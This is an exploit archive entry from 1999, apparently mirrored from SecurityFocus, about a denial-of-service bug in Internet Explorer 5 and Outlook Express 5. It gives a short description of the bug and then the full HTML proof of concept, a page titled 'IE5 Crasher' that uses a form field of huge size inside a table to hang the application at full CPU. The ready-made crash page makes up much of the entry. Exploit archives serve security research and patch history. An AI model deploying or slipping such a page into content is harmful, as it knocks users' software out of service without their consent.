Lucene search

K
exploitpackNeon BunnyEXPLOITPACK:05DAF63096A8EDDE035941821B2D445D
HistoryAug 27, 1999 - 12:00 a.m.

Microsoft Internet Explorer 5 - HTML Form Control Denial of Service

1999-08-2700:00:00
Neon Bunny
7

Microsoft Internet Explorer 5 - HTML Form Control Denial of Service

Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 HTML Form Control DoS

source: https://www.securityfocus.com/bid/606/info

Certain Microsoft applications (IE5, Outlook Express 5) are unable to display large HTML form fields within HTML tables. Attempts to view the offending table will cause the application to "hang" and consume 100% CPU resources until the application is closed. 

---{START SOURCE}---

<html>

<head>
<title>NeonBunny's IE5 Crasher</title>
</head>

<body>

<form method="POST">

<table>
<tr>
<td width="20%"><input type="text" name="State" size="99999999"
maxlength="99999999" value=""></td>
</tr>
</table>

</form>
</body>
</html>

---{STOP SOURCE}---